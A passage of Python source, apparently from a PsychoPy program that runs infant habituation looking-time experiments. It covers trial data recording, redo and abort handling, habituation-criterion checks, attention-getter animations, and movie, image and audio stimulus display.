isinstance(j, str):\n try:\n q[i] = eval(j)\n except:\n errDlg = gui.Dlg(title=\"Settings error\")\n errDlg.addText(\"A setting for trial type \" + i + \" contains text where number expected. Please update settings in builder!\")\n errDlg.show()\n core.quit()\n\n self.freezeFrame = eval(settingsDict['freezeFrame']) # time that movie remains on first frame at start of trial.\n self.playAttnGetter = eval(settingsDict['playAttnGetter']) # Trial-by-trial marker of which attngetter goes with which trial (if applicable).\n self.attnGetterList = eval(settingsDict['attnGetterList']) # List of all attention-getters\n # Go through each item in attnGetterList, find its stimloc parameter, and replace \\\\ with / or vise-versa\n for [i,j] in self.attnGetterList.items():\n j['stimLoc'] = ''.join([self.dirMarker if x == otherOS else x for x in j['stimLoc']])\n try: # To allow for better backwards compatibility, won't crash if this was made in a version that has no startImage or endImage lines\n self.startImage = settingsDict['startImage']\n self.endImage = settingsDict['endImage']\n self.nextFlash = eval(settingsDict['nextFlash']) # 0 or 1, whether to flash when A is required for next trial.\n except:\n self.startImage = ''\n self.endImage = ''\n self.nextFlash = 0\n try:\n self.habThresh = eval(settingsDict['habThresh'])\n except:\n self.habThresh = 1.0\n\n if len(self.stimPath) > 0 and self.stimPath[-1] is not self.dirMarker: # If it was made in one OS and running in another\n self.stimPath = [self.dirMarker if x == otherOS else x for x in self.stimPath]\n self.stimPath = ''.join(self.stimPath)\n\n '''\n END SETTINGS\n '''\n self.habCount = 0 # For hab designs, checks the # of habituation trials completed\n self.habCrit = 0 # initial setting of habcrit at 0\n self.habSetWhen = -1\n self.habMetWhen = -1 # Ported from MB4: Tracks both when the habituation criterion is set, and met.\n self.maxHabIndex = 0\n self.habDataCompiled=[0]*self.maxHabTrials # A new easy way to track just hab trials, even with complex meta-trial structure.\n self.dataMatrix = [] # primary data array\n self.blockDataTags = {}\n for i in self.blockDataList:\n self.blockDataTags[i] = [] # Set up for run to build this list.\n # data format: snum, sID, age in months, age in days, sex, condition, trial, GNGtrial, trial type, hab crit, on-time, number of gazes, off-time, number of look-offs\n # then same again 
at the end for b-coder?\n self.badTrials = [] # data array for bad trials\n self.verboseOn = [] # \"verbose\" data aray for gazes on, that includes each individual gaze, when it happened, etc.\n self.verboseOff = [] # same for off-time\n self.verboseOn2 = [] # for coder B. Can't assume that they will line up in terms of number of gazes so can't put them in same file.\n self.verboseOff2 = [] # for coder B.\n self.badVerboseOn = [] # same as above but for bad trials\n self.badVerboseOff = [] # same as above but for bad trials\n self.badVerboseOn2 = [] # as above for coder B\n self.badVerboseOff2 = [] # as above for coder B\n if not self.stimPres:\n self.endTrialSound = sound.Sound('A', octave=4, sampleRate=44100, secs=0.2)\n self.endHabSound = sound.Sound('G', octave=4, sampleRate=44100, secs=0.2)\n if type(self.maxDur) is int: # Secretly MaxDur will always be a dict, but if it's a constant we just create the dict here\n tempDur = self.maxDur\n self.maxDur = {} # create a dict\n # look up unique names in trialOrder to get all the trial types\n for x in self.trialOrder:\n self.maxDur[x] = tempDur # Python: Yes, it really is that easy.\n self.statusOffset = 0\n self.statusOffsetY = 0\n self.testOffset = 0\n self.frameCount = 0 # the frame counter for the movement of A and B, based on the refresh rate.\n self.pauseCount = 0 # used for ISI calculations\n self.stimName = '' # used for adding the name of the stimulus file to the output.\n self.key = pyglet.window.key # This initiates the keyhandler. Here so we can then set the relevant keys.\n self.secondKey = self.key.L\n self.verbDatList = {'verboseOn':[], 'verboseOff':[], 'verboseOn2':[], 'verboseOff2':[]} # a dict of the verbose data arrays\n self.verbBadList = {'verboseOn':[], 'verboseOff':[], 'verboseOn2':[], 'verboseOff2':[]} # Corresponding for bad data\n\n '''\n FUNCTIONS\n '''\n\n def abortTrial(self, onArray, offArray, trial, ttype, onArray2, offArray2, stimName = '', habTrialNo = 0): # the 2nd arrays are if there are two coders.\n \"\"\"\n Only happens when the 'abort' button is pressed during a trial. 
Creates a \"bad trial\" entry\n out of any data recorded for the trial so far, to be saved later.\n\n :param onArray: Gaze-on events for coder 1\n :type onArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param offArray: Gaze-off events for coder 1\n :type offArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param trial: trial number\n :type trial: int\n :param ttype: trial type\n :type ttype: string\n :param onArray2: Gaze-on events for (optional) coder 2\n :type onArray2: list of dicts\n :param offArray2: Gaze-off events for (optional) coder 2\n :type offArray2: list of dicts\n :param stimName: If presenting stimuli, name of the stim file\n :type stimName: string\n :return:\n :rtype:\n \"\"\"\n\n sumOn = 0\n sumOff = 0\n if habTrialNo <= 0:\n habTrialNo = ''\n for i in range(0, len(onArray)):\n sumOn = sumOn + onArray[i]['duration']\n for j in range(0, len(offArray)):\n sumOff = sumOff + offArray[j]['duration']\n # needs to be .extend or you get weird array-within-array-within-array issues that become problematic later\n self.verbBadList['verboseOn'].extend(onArray)\n self.verbBadList['verboseOff'].extend(offArray)\n sumOn2 = 0\n sumOff2 = 0\n if len(onArray2) > 0 or len(offArray2) > 0:\n for i in range(0, len(onArray2)):\n sumOn2 = sumOn2 + onArray2[i]['duration']\n for j in range(0, len(offArray2)):\n sumOff2 = sumOff2 + offArray2[j]['duration']\n self.verbBadList['verboseOn2'].extend(onArray2)\n self.verbBadList['verboseOff2'].extend(offArray2)\n tempData = {'sNum': self.sNum, 'sID':self.sID, 'months': self.ageMo, 'days': self.ageDay, 'sex': self.sex, 'cond': self.cond,\n 'condLabel': self.condLabel,'trial': trial, 'GNG': 0, 'trialType': ttype, 'stimName': stimName,\n 'habCrit': self.habCrit, 'habTrialNo': habTrialNo, 'sumOnA': sumOn, 'numOnA': len(onArray), 'sumOffA': sumOff,\n 'numOffA': len(offArray), 'sumOnB': sumOn2, 'numOnB': len(onArray2), 'sumOffB': sumOff2,\n 'numOffB': len(offArray2)}\n self.badTrials.append(tempData)\n\n def dataRec(self, onArray, offArray, trial, type, onArray2, offArray2, stimName = '', habTrialNo = 0):\n \"\"\"\n Records the data for a trial that ended normally.\n\n :param onArray: Gaze-on events for coder 1\n :type onArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param offArray: Gaze-off events for coder 1\n :type offArray: list of dicts {trial, trialType, startTime, endTime, duration}\n :param trial: trial number\n :type trial: int\n :param type: trial type\n :type type: string\n :param onArray2: Gaze-on events for (optional) coder 2\n :type onArray2: list\n :param offArray2: Gaze-off events for (optional) coder 2\n :type offArray2: list\n :param stimName: If presenting stimuli, name of the stim file\n :type stimName: string\n :param habTrialNo: If part of a hab block, what hab trial it was part of.\n :type habTrialNo: int\n :return:\n :rtype:\n \"\"\"\n sumOn = 0\n sumOff = 0\n if habTrialNo <= 0:\n habTrialNo = ''\n # loop through each array adding up gaze duration (on and off).\n for i in range(0, len(onArray)):\n sumOn = sumOn + onArray[i]['duration']\n for j in range(0, len(offArray)):\n sumOff = sumOff + offArray[j]['duration']\n sumOn2 = 0\n sumOff2 = 0\n if len(offArray2) > 0 or len(onArray2) > 0:\n for i in range(0, len(onArray2)):\n sumOn2 = sumOn2 + onArray2[i]['duration']\n for j in range(0, len(offArray2)):\n sumOff2 = sumOff2 + offArray2[j]['duration']\n self.verbDatList['verboseOn2'].extend(onArray2)\n self.verbDatList['verboseOff2'].extend(offArray2)\n # add to 
verbose master gaze array\n        self.verbDatList['verboseOn'].extend(onArray)\n        self.verbDatList['verboseOff'].extend(offArray)\n        tempData = {'sNum': self.sNum, 'sID': self.sID, 'months': self.ageMo, 'days': self.ageDay, 'sex': self.sex, 'cond': self.cond,\n                    'condLabel': self.condLabel, 'trial': trial, 'GNG': 1, 'trialType': type, 'stimName': stimName,\n                    'habCrit': self.habCrit, 'habTrialNo': habTrialNo, 'sumOnA': sumOn, 'numOnA': len(onArray), 'sumOffA': sumOff,\n                    'numOffA': len(offArray), 'sumOnB': sumOn2, 'numOnB': len(onArray2), 'sumOffB': sumOff2,\n                    'numOffB': len(offArray2)}\n        self.dataMatrix.append(tempData)\n\n    def redoTrial(self, trialNum):\n        """\n        Allows you to redo a trial after it has ended. Similar to abort trial, but under\n        the assumption that the data has already been recorded and needs to be replaced.\n        Decrementing of trial numbers is handled in doExperiment when the relevant key is\n        pressed.\n\n        :param trialNum: Trial number to redo\n        :type trialNum: int\n        :return:\n        :rtype:\n        """\n\n        newTempData = {}\n        i = 0\n        while i < len(self.dataMatrix):\n            if self.dataMatrix[i]['trial'] == trialNum and self.dataMatrix[i]['GNG'] == 1:\n                trialIndex = i\n                newTempData = self.dataMatrix[i]\n                break\n            else:\n                i += 1\n        # add the new 'bad' trial to badTrials\n        newTempData['GNG'] = 0\n        if self.dataMatrix[trialIndex]['trialType'][0:4] == 'hab.':  # Redoing a habituation trial\n            tempName = deepcopy(self.dataMatrix[trialIndex]['trialType'])\n            tempName = tempName[4:] # Just removing 'hab.'\n            # Subtract data from self.habDataCompiled before checking whether we reduce the hab count, to make indexing\n            # the correct part of habDataCompiled easier. Notably, reduces but does not inherently zero out.\n            if tempName in self.calcHabOver:  # Make sure it's part of the hab calc\n                self.habDataCompiled[self.habCount-1] = self.habDataCompiled[self.habCount-1] - self.dataMatrix[trialIndex]['sumOnA']\n                if self.habDataCompiled[self.habCount-1] < 0:  # For rounding errors\n                    self.habDataCompiled[self.habCount-1] = 0\n            # If it's the end of the hab iteration, then reduce the hab count.\n            if '^' in self.actualTrialOrder[trialNum-1]:  # This is kind of a dangerous kludge that hopefully won't come up that often.\n                self.habCount -= 1\n        elif newTempData['trialType'] == 'Hab':\n            self.habCount -= 1\n            self.habDataCompiled[self.habCount] = 0  # Resets the appropriate instance of the hab data structure\n        self.badTrials.append(newTempData)\n        # remove it from dataMatrix\n        self.dataMatrix.remove(self.dataMatrix[trialIndex])\n        # basically need to read through the verbose matrices, add everything that references that trial to the 'bad'\n        # verbose data matrices, and mark the relevant lines for later deletion\n        for q,z in self.verbDatList.items():\n            if len(z) > 0:  # Avoid any blank arrays (e.g. 
if there is no coder 2)\n                for i in range(0, len(self.verbDatList[q])):\n                    if self.verbDatList[q][i]['trial'] == trialNum:\n                        # Deepcopy needed to stop it from tying the badlist entries to the regular entries and removing them.\n                        self.verbBadList[q].append(deepcopy(self.verbDatList[q][i]))\n                        self.verbDatList[q][i]['trial'] = 99\n                # Elegantly removes all tagged lines of verbose data\n                self.verbDatList[q] = [vo for vo in self.verbDatList[q] if vo['trial'] != 99]\n\n    def checkStop(self):\n        """\n        After a hab trial, checks the habituation criteria and returns True if any of them are met.\n        Also responsible for setting the habituation criterion according to settings.\n        (For example, with setCritWindow = 3 and setCritDivisor = 2, the initial criterion is the summed\n        looking time of the first three hab trials, divided by 2.)\n        Prior to any criteria being set, self.habCrit is 0, and self.habSetWhen is -1.\n\n        Uses a sort of parallel data structure that just tracks hab-relevant gaze totals. As a bonus, this means it now\n        works for both single-target and preferential looking designs with no modification.\n\n        :return: True if hab criteria have been met, False otherwise\n        :rtype:\n        """\n\n        if self.habCount == self.setCritWindow and self.setCritType != 'Threshold':  # time to set the hab criterion. This will be true for both dynamic and first\n            sumOnTimes = 0\n            for j in range(0,self.habCount):\n                sumOnTimes = sumOnTimes + self.habDataCompiled[j]\n            self.habCrit = sumOnTimes / self.setCritDivisor\n            self.habSetWhen = deepcopy(self.habCount)\n        elif self.setCritType == 'Peak':  # Checks if we need to update the hab criterion\n            sumOnTimes = 0\n            index = self.habCount - self.setCritWindow  # How far back should we look?\n            for n in range(index, self.habCount):  # now, starting with that trial, go through and add up the good trial looking times\n                sumOnTimes = sumOnTimes + self.habDataCompiled[n]\n            sumOnTimes = sumOnTimes / self.setCritDivisor\n            if sumOnTimes > self.habCrit:\n                self.habCrit = sumOnTimes\n                self.habSetWhen = deepcopy(self.habCount)\n        elif self.setCritType == 'Max' and self.habCount > self.setCritWindow:  # Absolute max looking time among hab trials, regardless of order.\n            sumOnTimes = 0\n            habOns = deepcopy(self.habDataCompiled)\n            habOns.sort()  # Rearranges the array into lowest-highest.\n            lastHabUsed = 0\n            for i in range(-1*self.setCritWindow,0):\n                sumOnTimes = sumOnTimes + habOns[i]\n                # This convoluted mess finds the last instance of the 'max' value(s) used in the computation.\n                lastHabUsed = max(lastHabUsed,len(self.habDataCompiled) - self.habDataCompiled[::-1].index(habOns[i]))\n            sumOnTimes = sumOnTimes / self.setCritDivisor\n            if sumOnTimes > self.habCrit:\n                self.habCrit = sumOnTimes\n                self.habSetWhen = lastHabUsed\n        elif self.setCritType == 'Threshold' and self.habCount >= self.setCritWindow and self.habSetWhen == -1:\n            sumOnTimes = 0\n            index = self.habCount - self.setCritWindow  # How far back should we look?\n            for j in range(index,self.habCount):\n                sumOnTimes = sumOnTimes + self.habDataCompiled[j]\n            if sumOnTimes > self.habThresh:\n                self.habCrit = sumOnTimes / self.setCritDivisor\n                self.habSetWhen = deepcopy(self.habCount)\n\n        # Now we separate out the set and met business.\n        if self.habCount == self.maxHabTrials:\n            # end habituation and go to test\n            if not self.stimPres:\n                for i in [0, 1, 2]:\n                    core.wait(.25)  # an inadvertent side effect of playing the sound is a short pause before the test trial can begin\n                    self.endHabSound.play()\n            self.habMetWhen = self.habCount\n            return True\n        elif self.habCount >= self.setCritWindow + self.metCritWindow and self.habSetWhen > -1:  # if we're far enough in that we can plausibly meet the hab criterion\n            # 
Problem: Fixed window, peak, and max as they relate to habSetWhen....\n            # Fixed window is probably the only thing that should ignore habSetWhen.\n            if self.habCount < self.habSetWhen + self.metCritWindow and self.metCritStatic == 'Moving':  # Was the hab set "late" and are we too early as a result\n                return False\n            else:\n                sumOnTimes = 0\n                index = self.habCount - self.metCritWindow\n                if (self.metCritStatic == 'Moving') or (self.habCount-self.setCritWindow) % self.metCritWindow == 0:\n                    for n in range(index, self.habCount):  # now, starting with that trial, go through and add up the good trial looking times\n                        sumOnTimes = sumOnTimes + self.habDataCompiled[n]\n                    sumOnTimes = sumOnTimes / self.metCritDivisor\n                    if sumOnTimes < self.habCrit:\n                        # end habituation and go to test\n                        if not self.stimPres:\n                            for i in [0, 1, 2]:\n                                core.wait(.25)  # TODO: an inadvertent side effect of playing the sound is a short pause before the test trial can begin\n                                self.endHabSound.play()\n                        self.habMetWhen = self.habCount\n                        return True\n                    else:\n                        return False\n                else:\n                    return False\n        else:\n            return False\n\n    def attnGetter(self, trialType):\n        """\n        Plays either a default attention-getter animation or a user-defined one.\n        Separate settings for audio w/shape and video file attention-getters.\n\n        :param trialType: the current trial type, used to look up which attention-getter to play\n        :type trialType: string\n        :return:\n        :rtype:\n        """\n        self.statusSquareA.fillColor = 'blue'\n        self.statusTextA.text = "RDY"\n        self.statusSquareB.fillColor = 'blue'\n        self.statusTextB.text = "RDY"\n        self.statusSquareA.draw()\n        self.statusTextA.draw()\n        self.statusSquareB.draw()\n        self.statusTextB.draw()\n        if self.blindPres < 2:\n            self.trialText.draw()\n            if self.blindPres < 1:\n                self.readyText.draw()\n        self.win2.flip()\n\n        attnGetter = self.attnGetterList[self.playAttnGetter[trialType]]  # Reads attention-getter from list of AGs.\n        if attnGetter['stimType'] == 'Audio':  # '==' rather than 'is': compare string values, not object identity\n            if attnGetter['shape'] == 'Rectangle':\n                useShape = self.attnGetterSquare\n            elif attnGetter['shape'] == 'Cross':\n                useShape = self.attnGetterCross\n                sizeMult = 50\n            else:\n                useShape = self.attnGetterStar\n                sizeMult = 1\n            x = 0\n            useShape.ori = 0\n            useShape.fillColor = attnGetter['color']\n            animDur = int(60*attnGetter['file'].getDuration())\n            attnGetter['file'].play()\n            for i in range(0, animDur):  # Animation set to length of sound\n                useShape.ori += 5  # Defines rotation speed in degrees. Arbitrary.\n                x += .1\n                if attnGetter['shape'] == 'Rectangle':\n                    useShape.height = sin(x) * (2*animDur)  # I don't know why this one works so well, but it does.\n                    useShape.width = tan(.25 * x) * (2*animDur)\n                else:\n                    useShape.size = tan(.025 * x) * (sizeMult*self.baseSize)\n                useShape.draw()\n                self.win.flip()\n        else:\n            dMovie = attnGetter['file']\n            dMovie.seek(0.0)\n            self.frameCount = 0\n            self.ISI['NobodyNameTheirTrialTypeThis'] = 0.0  # A goofy solution but it'll work. dispMovieStim requires a trial type, and the ISI for an attention-getter needs to be 0.\n            while self.dispMovieStim('NobodyNameTheirTrialTypeThis', dMovie) < 2:\n                pass\n\n        self.dispCoderWindow(0)\n        #self.win.flip()  # clear screen (change?)\n\n    def flashCoderWindow(self, rep=False):\n        """\n        Flash the background of the coder window to alert the experimenter they need to initiate the next trial.\n        .2 seconds of white and black, flashed twice. 
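(At 60fps that is four 12-frame color phases, so an uninterrupted double flash lasts roughly 800ms.) 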
Can lengthen gap between trials but listens for 'A' on every flip.\n\n        :return:\n        :rtype:\n        """\n        flashing = True\n\n        # at 60fps, 200ms = 12 frames.\n        for i in range(0,12):\n            self.win2.color='white'\n            self.dispCoderWindow()\n            if self.keyboard[self.key.A]:\n                flashing = False\n                break\n        if flashing:\n            for i in range(0,12):\n                self.win2.color='black'\n                self.dispCoderWindow()\n                if self.keyboard[self.key.A]:\n                    flashing = False\n                    break\n        if flashing and not rep:\n            self.flashCoderWindow(rep=True)\n        self.win2.color='black'\n\n    def dispCoderWindow(self, trialType = -1):\n        """\n        Draws the coder window, according to trial type and blinding settings.\n\n        :param trialType: -1 = black (between trials). 0 = ready state. Otherwise irrelevant.\n        :type trialType: int or string\n        :return:\n        :rtype:\n        """\n        if trialType == -1:\n            self.statusSquareA.fillColor = 'black'\n            self.statusTextA.text = ''\n        elif self.blindPres < 2:\n            if trialType == 0:\n                self.statusSquareA.fillColor = 'blue'\n                self.statusTextA.text = "RDY"\n            elif self.lookingLeap():\n                self.statusSquareA.fillColor = 'green'\n                self.statusTextA.text = "ON"\n            else:\n                self.statusSquareA.fillColor = 'red'\n                self.statusTextA.text = "OFF"\n        else:\n            self.statusSquareA.fillColor = 'blue'\n            self.statusTextA.text = ""\n\n        self.statusSquareA.draw()\n        self.statusTextA.draw()\n        # Again for the second coder box.\n        if trialType == -1:\n            self.statusSquareB.fillColor = 'black'\n            self.statusTextB.text = ''\n        elif self.blindPres < 2:\n            if trialType == 0:\n                self.statusSquareB.fillColor = 'blue'\n                self.statusTextB.text = "RDY"\n            elif self.keyboard[self.secondKey]:\n                self.statusSquareB.fillColor = 'green'\n                self.statusTextB.text = "ON"\n            else:\n                self.statusSquareB.fillColor = 'red'\n                self.statusTextB.text = "OFF"\n        else:\n            self.statusSquareB.fillColor = 'blue'\n            self.statusTextB.text = ""\n        self.statusSquareB.draw()\n        self.statusTextB.draw()\n        if self.blindPres < 2:\n            self.trialText.draw()\n            if self.blindPres < 1:\n                self.readyText.draw()\n        self.win2.flip()  # flips the status screen without delaying the stimulus onset.\n\n    def dispMovieStim(self, trialType, dispMovie):\n        """\n        Draws movie stimuli to the stimulus display, including movie-based attention-getters.\n\n        :param trialType: 0 for paused, otherwise a string\n        :type trialType: int or str\n        :param dispMovie: The moviestim3 object for the stimuli\n        :type dispMovie: moviestim3 object\n        :return: an int specifying whether the movie is in progress (0), paused on its last frame (1), or ending and looping (2)\n        :rtype: int\n        """\n\n        if self.frameCount == 0:  # initial setup\n            self.dummyThing.draw()\n            self.frameCount += 1\n            dispMovie.draw()\n            if trialType == 0:\n                self.frameCount = 0  # for post-attn-getter pause\n                dispMovie.pause()\n            else:\n                dispMovie.seek(0.0)  # Moved up here from below so that it CAN loop at all\n            self.win.flip()\n            return 0\n        elif self.frameCount == 1:\n            # print('playing')\n            dispMovie.play()\n            dispMovie.draw()\n            self.frameCount += 1\n            self.win.flip()\n            return 0\n        elif dispMovie.getCurrentFrameTime() >= dispMovie.duration - dispMovie._frameInterval*2 and self.pauseCount < self.ISI[trialType] * 60:  # pause, check for ISI.\n            self.dummyThing.draw()\n            dispMovie.pause()\n            dispMovie.draw()  # might want to have it vanish rather than leave it on the screen for the ISI, in which case comment out this line.\n            self.frameCount += 1\n            self.pauseCount += 1\n            self.win.flip()  # TODO: Goes blank if ISI is long enough. 
Pyglet problem.\n return 1\n elif dispMovie.getCurrentFrameTime() >= dispMovie.duration - dispMovie._frameInterval*2 and self.pauseCount >= self.ISI[trialType] * 60: # MovieStim's Loop functionality can't do an ISI\n self.dummyThing.draw()\n # print('repeating at ' + str(dispMovie.getCurrentFrameTime()))\n self.frameCount = 0 # changed to 0 to better enable studies that want to blank between trials\n self.pauseCount = 0\n dispMovie.draw() # Comment this out as well to blank between loops.\n self.win.flip()\n dispMovie.pause()\n #dispMovie.seek(0.0) #This seek seems to cause the replays.\n return 2\n else:\n dispMovie.draw()\n self.frameCount += 1\n self.win.flip()\n return 0\n\n def dispImageStim(self, dispImage):\n \"\"\"\n Very simple. Draws still-image stimuli and flips window\n\n :param dispImage: the visual.ImageStim object\n :type dispImage: visual.ImageStim object\n :return: constant, 1\n :rtype: int\n \"\"\"\n dispImage.draw()\n self.win.flip()\n return 1 # This essentially allows it to end at any time if this is set to \"movieend\"\n\n def dispAudioStim(self, trialType, dispAudio):\n \"\"\"\n For playing audio stimuli. A little more complicated than most because it needs to track whether the audio\n is playing or not. Audio plays separately from main thread.\n\n :param dispAudio: the stimuli as a sound.Sound object\n :type dispAudio: sound.Sound object\n :return: an int specifying whether the audio is in progress (0), we are in an ISI (1),\n or the audio is looping (2)\n :rtype: int\n \"\"\"\n if self.frameCount == 0: # We're going to use this as a mask for the status of the audio file\n dispAudio.play()\n self.frameCount = 1\n return 0\n elif self.frameCount == 1:\n if dispAudio.status not in [STARTED, PLAYING] and self.pauseCount < self.ISI[trialType] * 60:\n self.pauseCount += 1\n return 1\n elif dispAudio.status not in [STARTED, PLAYING] and self.pauseCount >= self.ISI[trialType] * 60:\n self.frameCount = 0\n return 2\n else:\n return 0\n\n\n def dispTrial(self, trialType, dispMovie = False): #If no stim, dispMovie defaults to false.\n \"\"\"\n Draws each frame of the trial. For stimPres, returns a movie-status value for determining when the movie has\n ended\n\n :param trialType: Current trial type\n :type trialType: string\n :param dispMovie: A dictionary containing both the stimulus type and the object with the stimulus file(s) (if applicable)\n :type dispMovie: bool or dict\n :return: 1 or 0. 
1 = end of movie for trials that end on that.\n :rtype: int\n \"\"\"\n self.dispCoderWindow(trialType)\n # now for the test trial display\n if self.stimPres:\n if dispMovie['stimType'] == 'Movie':\n t = self.dispMovieStim(trialType, dispMovie['stim'])\n elif dispMovie['stimType'] == 'Image':\n t = self.dispImageStim(dispMovie['stim'])\n elif dispMovie['stimType'] == 'Audio' and trialType != 0: # No still-frame equivalent\n t = self.dispAudioStim(trialType, dispMovie['stim'])\n elif dispMovie['stimType'] == 'Image with audio': # Audio and image together\n if trialType != 0: # No still-frame equivalent\n t = self.dispAudioStim(trialType,dispMovie['stim']['Audio'])\n else:\n t = 0\n p = self.dispImageStim(dispMovie['stim']['Image'])\n else:\n t = 0\n else:\n t = 0 # Totally irrelevant.\n return t\n\n def redoSetup(self, tn, autoAdv):\n \"\"\"\n Lays the groundwork for redoTrial, including correcting the trial order, selecting the right stim, etc.\n\n :param tn: Trial number (trialNum)\n :type tn: int\n :param autoAdv: The current auto-advance trial type list (different on first trial for Reasons)\n :type autoAdv: list\n :return: list, [disMovie, trialNum], the former being the movie file to play if relevant, and the latter being the new trial number\n :rtype:\n \"\"\"\n numTrialsRedo = 0\n trialNum = tn\n tempHabCount = deepcopy(self.habCount)\n if trialNum > 1: # This stops it from trying to redo a trial before the experiment begins.\n trialNum -= 1\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.')+1:]\n numTrialsRedo += 1\n if self.stimPres:\n self.counters[trialType] -= 1\n if self.counters[trialType] < 0:\n self.counters[trialType] = 0\n while trialType in autoAdv and trialNum > 1: # go find the last non-AA trial and redo from there\n trialNum -= 1\n trialType = self.actualTrialOrder[trialNum - 1]\n while '.' in trialType:\n trialType = trialType[trialType.index('.') + 1:]\n numTrialsRedo += 1\n if self.stimPres:\n self.counters[trialType] -= 1\n if self.counters[trialType] < 0: # b/c counters operates over something that is like actualTrialOrder, it should never go beneath 0\n self.counters[trialType] = 0\n if self.stimPres:\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n disMovie = self.stimDict[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n disMovie = self.stimDict[trialType][self.counters[trialType]]\n self.counters[trialType] += 1\n if self.counters[trialType] < 0:\n self.counters[trialType] = 0\n else:\n disMovie = 0\n self.trialText.text = \"Trial no. 
\" + str(trialNum)\n if self.blindPres < 1:\n self.rdyTextAppend = \" NEXT: \" + self.actualTrialOrder[trialNum - 1] + \" TRIAL\"\n for i in range(trialNum, trialNum + numTrialsRedo): # Should now rewind all the way to the last non-AA trial.\n self.redoTrial(i)\n if self.habCount != tempHabCount: # Did we change a trial that can change checkStop?\n # If hab type is threshold, max, or peak, we might need to recalculate dynamically\n if self.habSetWhen >= self.habCount:\n self.habSetWhen = -1\n self.habCrit = 0\n if self.setCritType != 'First': # If it's 'first', it'll just solve itself.\n dummy = self.checkStop()\n # If habituation has been reached, we have to basically undo what happens when a hab crit is met.\n if self.habMetWhen > -1 and self.habCount != self.maxHabTrials - 1: # If it was the last hab trial possible, it'll just solve itself with no further action\n if not self.checkStop(): # Almost always true in this case, because we're redoing a hab trial.\n self.habMetWhen = -1 # Reset\n tempTN = trialNum + max(len(self.habTrialList), 1) # Starting with the next trial.\n ctr = 0\n for h in range(self.habCount+1, self.maxHabTrials):\n [irrel, irrel2] = self.insertHab(tn=tempTN+ctr*max(len(self.habTrialList), 1), hn=h)\n ctr += 1\n return [disMovie, trialNum]\n\n def jumpToTest(self, tn):\n \"\"\"\n Jumps out of a hab block into whatever the first trial is that is not a hab trial or in a hab meta-trial-type\n :param tn: trial number\n :type tn: int\n :return: [disMovie, trialType] as insertHab, the former being the movie file to play if relevant, and the latter being the new trial type\n :rtype: list\n \"\"\"\n trialNum = tn\n tempNum = self.maxHabIndex\n # It's actually necessary to decrement the counter for the current trial type to deal with jump/insert!\n currType = self.actualTrialOrder[trialNum - 1]\n while '.' in currType: # Dealing with blocks and recursions\n currType = currType[currType.index('.') + 1:]\n self.counters[currType] -= 1\n if self.counters[currType] < 0:\n self.counters[currType] = 0\n # trialNum is in fact the index after the current trial at this point\n # so we can just erase everything between that and the first non-hab trial.\n del self.actualTrialOrder[(trialNum - 1):(tempNum + 1)]\n try:\n trialType = self.actualTrialOrder[trialNum - 1] # Doesn't look for hab trial because...should never happen!\n if self.stimPres:\n if self.counters[trialType] >= len(self.stimNames[trialType]): # Comes up with multiple repetitions of few movies\n self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n disMovie = self.stimDict[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n else:\n self.stimName = self.stimNames[trialType][self.counters[trialType]]\n disMovie = self.stimDict[trialType][self.counters[trialType]]\n self.counters[trialType] += 1\n else:\n disMovie = 0\n if self.blindPres < 1:\n self.rdyTextAppend = \" NEXT: \" + trialType + \" TRIAL\"\n return [disMovie, trialType]\n except IndexError: # Comes up when there are no non-hab trials\n self.endExperiment()\n return[0,'4']\n\n def insertHab(self, tn, hn=-1):\n \"\"\"\n Literally insert a new hab trial or meta-trial into actualTrialOrder, get the right movie, etc.\n\n :param tn: trial number to insert the trial\n :type tn: int\n :param hn: HabCount number to insert the hab trial. By default, whatever the current habcount is. 
However, there\n        are edge cases when recovering from "redo" trials where we want to throw in a hab trial further down the line.\n        :type hn: int\n        :return: [disMovie, trialType], the former being the movie file to play if relevant, and the latter being the new trial type\n        :rtype: list\n        """\n        trialNum = tn\n        if hn == -1:\n            hn = self.habCount\n        habNum = hn\n        if len(self.habTrialList) > 0:\n            self.blockExpander(self.habTrialList, 'hab', hab=True, habNum=habNum+1, insert=trialNum-1)\n            # reset self.maxHabIndex based on last instance of '^'.\n            for n in range(trialNum, len(self.actualTrialOrder)):\n                if '^' in self.actualTrialOrder[n]:\n                    self.maxHabIndex = n\n        else:\n            self.actualTrialOrder.insert(trialNum - 1, 'Hab')\n            self.maxHabIndex = trialNum - 1\n        trialType = self.actualTrialOrder[trialNum - 1]\n        while '.' in trialType:\n            trialType = trialType[trialType.index('.') + 1:]\n        if self.stimPres and habNum == self.habCount:  # If we're inserting something way down the line, don't mess with it yet.\n            if self.counters[trialType] >= len(self.stimNames[trialType]):  # Comes up with multiple repetitions of few movies\n                self.stimName = self.stimNames[trialType][self.counters[trialType] % len(self.stimNames[trialType])]\n                disMovie = self.stimDict[trialType][\n                    self.counters[trialType] % len(self.stimNames[trialType])]\n            else:\n                self.stimName = self.stimNames[trialType][self.counters[trialType]]\n                disMovie = self.stimDict[trialType][\n                    self.counters[trialType]]\n            self.counters[trialType] += 1\n            if self.counters[trialType] < 0:\n                self.counters[trialType] = 0\n        else:\n            disMovie = 0\n        if self.blindPres < 1:  # TODO: Do we need this?\n            self.rdyTextAppend = " NEXT: " + self.actualTrialOrder[trialNum - 1] + " TRIAL"\n        return [disMovie,trialType]\n\n    def doExperiment(self):\n        """\n        The primary control function and main trial loop.\n\n        :return:\n        :rtype:\n        """\n        self.currTestTrial = 0\n        # primary trial loop, go until end of exp.\n        runExp = True\n        trialNum = 1\n        self.trialText.text = "Trial no. " + str(trialNum)\n        self.readyText.text = "Before first trial"\n        self.rdyTextAppend = ""\n        trialType = self.actualTrialOrder[0]\n        if self.blindPres < 1:\n            self.rdyTextAppend = " NEXT: " + trialType + " TRIAL"\n        didRedo = False\n        self.dispCoderWindow() #Update coder window\n        AA = []  # a localized autoadvance to allow for first trial\n        while runExp:\n            reviewed = False\n            if len(self.badTrials) > 0:\n                badTrialTrials = [x['trial'] for x in self.badTrials]  # Gets just trial numbers\n                if trialNum in 